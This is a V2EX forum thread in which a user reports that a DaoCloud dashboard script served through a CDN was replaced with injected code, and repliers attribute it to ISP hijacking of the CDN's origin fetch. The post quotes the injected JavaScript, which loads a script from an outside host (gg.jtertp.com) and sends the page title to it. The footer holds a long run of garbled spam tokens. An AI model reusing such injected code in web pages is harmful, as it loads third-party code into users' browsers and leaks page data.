今天居然遇到了 DaoCloud 被 HTTPS 劫持? - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
wzxjohn
V2EX    问与答

今天居然遇到了 DaoCloud 被 HTTPS 劫持?

  •  < href="Javascript:" Onclick="downVoteTopic(233684);" class="vote">
  •   wzxjohn 2015-11-04 21:45:45 +08:00 1894 次点击
    这是一个创建于 3695 天前的主题,其中的信息可能已经有所发展或是发生改变。
    今天访问 DaoCloud 的时候突然控制面板卡吃豆人了,仔细一看发现居然是因为加载了 HTTP 的资源被 Chrome 拦住了,打开控制台发现是这个 JS :
    https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
    正常情况应该是一大串,但是我得到的是:

    document.write("<script language='Javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='Javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}

    搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
    求各路大神分析原因。。。
    PS :证书应该没有问题,是 GeoTrust 的。
    PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
    12 条回复    2016-11-05 12:26:52 +08:00
    Laforet
        1
    Laforet  
       2015-11-04 21:53:07 +08:00
    把证书保存出来对比一下。

    不过看你的描述应该是那个域名上所有的请求都被劫持到了 http 上才会出现混合内容
    hgc81538
        2
    hgc81538  
       2015-11-04 21:59:22 +08:00
    是源被劫持了
    t/212885
    lhbc
        3
    lhbc  
       2015-11-04 23:34:56 +08:00 via Android
    某 CDN 回源被劫持
    运营商真变态啊, IDC 之间的网络也搞劫持
    运营商为推广全面 https 化真是费尽心机啊
    wzxjohn
        4
    wzxjohn  
    OP
       2015-11-04 23:47:39 +08:00
    @Laforet 这样的话证书就不可能对了,所以肯定不是全劫持到 HTTP
    @hgc81538
    @lhbc 我看了那篇文章,但是这个不能解释为啥连七牛返回的 Header 都被改掉了。。。
    hgc81538
        5
    hgc81538  
       2015-11-04 23:58:29 +08:00 via iPhone
    @wzxjohn 因商劫持了源 cdn 的流量,它想更改什都可以
    Laforet
        6
    Laforet  
       2015-11-05 05:30:02 +08:00
    @lhbc
    @wzxjohn
    @hgc81538

    长见识了,居然这样也可以
    wzxjohn
        7
    wzxjohn  
    OP
       2015-11-05 09:38:10 +08:00
    @hgc81538 劫持回源流量怎么可能 CDN 服务器返回的 Header 也被改了。。。
    hgc81538
        8
    hgc81538  
       2015-11-05 10:21:39 +08:00 via iPhone
    @wzxjohn 用求文件, cdn 文件找源, cdn 向源求文件,商劫持通, cdn 收到被改的容,包括 header
    wzxjohn
        9
    wzxjohn  
    OP
       2015-11-05 10:23:31 +08:00
    @hgc81538 你还是没懂我的意思,本身七牛 CDN 服务器会返回一些固定的头,但是被劫持的文件却没有这些头。。。
    Senorsen
        10
    Senorsen  
       2016-11-05 12:00:50 +08:00
    可怕,我说怎么最近 daocloud 首页这么卡…

    CDN 回源时劫持,真是个厉害的新套路
    Senorsen
        11
    Senorsen  
       2016-11-05 12:02:39 +08:00
    呃… 居然是个老帖
    wzxjohn
        12
    wzxjohn  
    OP
       2016-11-05 12:26:52 +08:00
    @Senorsen 哈哈哈~很久之前啦~
    关于     助文档     自助推广系统     博客     API     FAQ     Solana     3198 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 25ms UTC 11:06 PVG 19:06 LAX 03:06 JFK 06:06
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86